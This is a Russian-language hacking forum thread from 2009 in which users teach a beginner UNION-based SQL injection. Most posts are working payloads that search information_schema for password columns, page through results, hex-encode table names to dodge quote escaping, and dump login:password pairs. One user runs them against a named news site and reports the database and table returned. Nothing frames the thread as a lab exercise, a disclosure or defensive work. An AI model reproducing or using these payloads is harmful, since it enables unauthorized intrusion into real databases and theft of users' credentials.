28.04.2009, 17:33
|
|
Новичок
Регистрация: 27.04.2009
Сообщений: 10
С нами:
8968918
Репутация:
2
|
|
Сообщение от geezer.code
линк сюда, либо в пм.
зы +from+ information_schema.columns+
    долбанная невнимательность
|
|
|
28.04.2009, 18:02
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
С нами:
9035873
Репутация:
317
|
|
Может для начинающего это и лишния информация, но все таки...
Дабы упростить поск таблиц где есть поля "login"&"password" к (примеру..
Можно воспользоваться оператором like
Синтаксис такой:
news.php?id=-349+union+select+1,concat_ws(0x3a,table_name,table _schema),3,4,5,6,7,8,9+from+ information_shema.columns+where+column_name+like+' password'--+
Данный запрос выведет:
Имя таблици и названия базы, где есть поля password/* так же при необходимости слово password моно перевести в 16й код..
Так же моно листать через оператор limit
news.php?id=-349+union+select+1,concat_ws(0x3a,table_name,table _schema),3,4,5,6,7,8,9+from+ information_shema.columns+where+column_name+like+' password'+limit+1,1--+
Последний раз редактировалось farex; 28.04.2009 в 18:07..
|
|
|
|
28.04.2009, 18:51
|
|
Новичок
Регистрация: 27.04.2009
Сообщений: 10
С нами:
8968918
Репутация:
2
|
|
Сообщение от farex
Может для начинающего это и лишния информация, но все таки...
Дабы упростить поск таблиц где есть поля "login"&"password" к (примеру..
Можно воспользоваться оператором like
Синтаксис такой:
news.php?id=-349+union+select+1,concat_ws(0x3a,table_name,table _schema),3,4,5,6,7,8,9+from+ information_schema.columns+where+column_name+like+'password'--+
Данный запрос выведет:
Имя таблици и названия базы, где есть поля password/* так же при необходимости слово password моно перевести в 16й код..
Так же моно листать через оператор limit
news.php?id=-349+union+select+1,concat_ws(0x3a,table_name,table _schema),3,4,5,6,7,8,9+from+ information_schema.columns+where+column_name+like+'password'+lim it+1,1--+
а данный запрос выводит одно название базы где есть поля password/* или все?
получаем: Subscription:dvb т.е. table_name=Subscription
db_name=dvb ?
|
|
|
|
28.04.2009, 18:18
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
И к чему это? Прочти <title>(.*)</title>
|
|
|
|
28.04.2009, 18:24
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
С нами:
9035873
Репутация:
317
|
|
Ну вообще чел тока начинает крутить скули......
Это инфа, к общему развитию.....
|
|
|
|
28.04.2009, 18:28
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
С нами:
10077446
Репутация:
1020
|
|
Чисто password не всегда бывает, тогда уже '%pass%' или в хексе при слешировании кавычек.
|
|
|
|
28.04.2009, 19:01
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
С нами:
9035873
Репутация:
317
|
|
а данный запрос выводит одно название базы где есть поля password/* или все?
получаем: Subscription:dvb т.е. table_name=Subscription
db_name=dvb ?
Выводит названия базы и таблицу(в этой базе), где находятся колонка "password"
table_name=Subscription: имя таблици где есть колонка "password"
table_schema: имя бд в которой находится таблица "Subscription"
с колонкой "password"
Последний раз редактировалось farex; 28.04.2009 в 19:05..
|
|
|
|
28.04.2009, 19:10
|
|
Новичок
Регистрация: 27.04.2009
Сообщений: 10
С нами:
8968918
Репутация:
2
|
|
Сообщение от farex
table_name=Subscription - имя таблици где есть колонка "password"
db_name=dvb - имя бд в которой находится таблица "Subscription"
с колонкой "password"
 вот с этим не сопоставимо:http://xxx/news.php?id=-1' UNION SELECT 1,2,login,password,5,6 FROM Users LIMIT 1,1 -- видимо устаревает информация
Для вывода логина и пасс делаем:
-349+union+select+1,concat_ws(0x3a,login,password), 3,4,5,6,7,8,9+from+хекс(Subscription)+limit+1, 1
или же как-то подругому?
Для вывода логина и пасс имя БД нам необязательно? т.к. запросы все равно идут в пределах базы, к которой обращается скрипт.
|
|
|
|
28.04.2009, 19:27
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
С нами:
9035873
Репутация:
317
|
|
Для вывода логина и паса....(Когда ты уже узнал названия столбцов разумеется.
Делается так:
-349+union+select+1,concat_ws(0x3a,login,password), 3,4,5,6,7,8,9+from+table_name
где, table_name -это названия таблици (от кудого ты вытащил(login&password))
Для вывода логина и пасс имя БД нам необязательно?
Обязательно, лишm в том случае если таблица находится в другой базе ...
Например:
349+union+select+1,database(), 3,4,5,6,7,8,9
нам вывело, что названия БД "test"
а
349+union+select+1,table_schema, 3,4,5,6,7,8,9+from+information_schema.columns+wher e+table_name='users'
нам выдало, что таблица users находится в базе test1
тогда, для вывода, используем следующий запрос...
349+union+select+1,concat_ws(0x3a,login,password), 3,4,5,6,7,8,9+from+test1.users
Последний раз редактировалось farex; 28.04.2009 в 19:30..
|
|
|
|
28.04.2009, 20:07
|
|
Новичок
Регистрация: 27.04.2009
Сообщений: 10
С нами:
8968918
Репутация:
2
|
|
совсем запутался...
имеем: http://english.dvb.no/news.php?id=-349+union+select+1,concat_ws(0x3a,table_name,table _schema),3,4,5,6,7,8,9+from+information_schema.col umns+where+column_name+like+0x70617373776f7264--
Subscription:dvb
соотв в базе dvb есть таблица Subscription в которой есть колонка(столбец) password
database ()= dvb
запрос:
http://english.dvb.no/news.php?id=-349+union+select+1,concat_ws(0x3a,login,password), 3,4,5,6,7,8,9+from+0x537562736372697074696f6e--
ничего не дает, видимо мы не знаем, а login ли мы ищем? правильно?
как достать его "login"?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
